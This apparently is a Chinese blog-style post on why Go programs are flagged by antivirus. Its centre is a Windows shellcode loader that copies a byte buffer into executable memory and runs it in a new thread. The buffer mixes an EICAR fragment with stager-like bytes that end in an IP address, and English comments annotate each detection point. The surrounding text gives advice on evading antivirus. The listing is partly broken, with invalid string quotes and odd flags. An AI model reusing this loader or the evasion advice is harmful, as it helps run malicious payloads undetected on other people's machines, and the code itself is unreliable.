该代码使用了一些系统调用和内存分配操作，这可能被一些杀软视为可疑行为，导致被查杀。特别是在使用反射、内存操作等技术实现类似代码注入、远程控制等功能时，更容易被杀软检测到。建议避免在代码中使用过多的系统调用和内存操作，同时使用杀软允许的 API 和技术实现所需功能。

package main

import (
    'syscall'
    'unsafe'
)

var (
    // Lazily resolved Win32 entry points. syscall.NewLazyDLL/NewProc exist only
    // in the Windows build of package syscall, so this file is Windows-only.
    // Nothing is resolved until the first .Call; LazyProc.Call panics if the
    // export cannot be found rather than returning an error.
    // NOTE(review): these names are written with single quotes, which are not
    // valid Go string-literal delimiters, so the listing does not build as printed.
    kernel32         = syscall.NewLazyDLL('kernel32.dll')
    // VirtualAlloc: allocates memory in the calling process with a chosen protection.
    virtualAlloc     = kernel32.NewProc('VirtualAlloc')
    // CreateThread: starts a new thread at an arbitrary start address.
    createThread     = kernel32.NewProc('CreateThread')
    // WaitForSingleObject: blocks on a handle until it is signaled or a timeout elapses.
    waitForSingleObj = kernel32.NewProc('WaitForSingleObject')
)

func main() {
    // Performs the in-process "allocate RWX memory -> copy bytes -> start a
    // thread at them -> block forever" sequence that the surrounding text says
    // antivirus/EDR engines treat as suspicious: each of these steps is a
    // well-known behavioral detection point on its own, and the sequence as a
    // whole is the canonical self-injection pattern. Every Win32 call below
    // discards its return values, so no failure is ever detected.
    buf := []byte{
        // The leading bytes are ASCII "-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*", a
        // fragment of the EICAR test string, which scanners flag by design.
        // The remaining bytes are an opaque payload that this listing does not
        // describe and that nothing below inspects.
        0x2d, 0x53, 0x54, 0x41, 0x4e, 0x44, 0x41, 0x52, 0x44, 0x2d, 0x41, 0x4e, 0x54, 0x49,
        0x56, 0x49, 0x52, 0x55, 0x53, 0x2d, 0x54, 0x45, 0x53, 0x54, 0x2d, 0x46, 0x49, 0x4c,
        0x45, 0x21, 0x24, 0x48, 0x2b, 0x48, 0x2a, 0x00, 0x35, 0x4f, 0x21, 0x50, 0x25, 0x40,
        0x41, 0x50, 0x5b, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68,
        0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53,
        0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89,
        0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2,
        0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5,
        0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38,
        0x2e, 0x31, 0x37, 0x30, 0x2e, 0x31, 0x32, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00,
    }

    shellcodeSize := len(buf)
    // VirtualAlloc(lpAddress=NULL, dwSize, flAllocationType, flProtect).
    // flAllocationType: 0x1000 (MEM_COMMIT) | 0x2000 (MEM_RESERVE); the extra
    // 0x40 is not a MEM_* flag — presumably a copy of the protection value.
    // flProtect: 0x40 = PAGE_EXECUTE_READWRITE. Private memory that is both
    // writable and executable is one of the signals memory-scanning and
    // API-hooking defenses key on. The returned address is never checked; on
    // failure VirtualAlloc returns 0.
    shellcode, _, _ := virtualAlloc.Call(
        0,
        uintptr(shellcodeSize),
        0x1000 | 0x2000 | 0x40,
        0x40,
    )

    // Reinterpret the raw address as a pointer to a 1 GiB byte array, slice it
    // to the buffer length, and copy the bytes in. If the allocation above
    // failed (address 0) this dereferences a nil pointer and the process crashes.
    copy((*[1 << 30]byte)(unsafe.Pointer(shellcode))[:shellcodeSize], buf)

    // CreateThread(NULL, 0, lpStartAddress=shellcode, NULL, 0, NULL): runs the
    // copied bytes as a thread entry point. A thread whose start address lies
    // in private (non-image) RWX memory is another standard detection
    // heuristic. The thread handle is discarded, so nothing can wait on or
    // observe the thread afterwards.
    _, _, _ = createThread.Call(
        0,
        0,
        shellcode,
        0,
        0,
        0,
    )

    // WaitForSingleObject(0xffffffff, 0xffffffff): handle -1 is the pseudo-handle
    // for the current process and 0xffffffff is INFINITE, so this wait never
    // returns. Its only effect is to keep main from exiting while the thread
    // started above is running.
    _, _, _ = waitForSingleObj.Call(
        uintptr(0xffffffff),
        uintptr(0xffffffff),
    )
}
Go 语言代码被杀软查杀原因分析及优化建议

